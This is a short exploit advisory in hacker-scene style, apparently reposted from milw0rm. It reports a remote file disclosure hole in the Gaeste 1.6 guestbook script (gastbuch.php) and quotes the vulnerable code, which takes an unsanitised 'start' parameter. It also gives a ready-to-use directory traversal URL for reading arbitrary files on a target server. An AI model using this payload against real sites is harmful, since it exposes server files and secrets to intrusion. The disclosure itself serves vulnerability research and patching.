++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability + + + + bd0rk || SOH-Crew + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ => Vendor: http://www.php4scripte.de/ => Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip => Bugfound3R: bd0rk => Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-) => Vulnerable Code in gastbuch.php line 2-3 ------------------------------- if (isset($_GET['start'])) { $start=$_GET['start']; ------------------------------- [+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php ###The 20 years old, german Hacker bd0rk### # milw0rm.com [2009-02-09]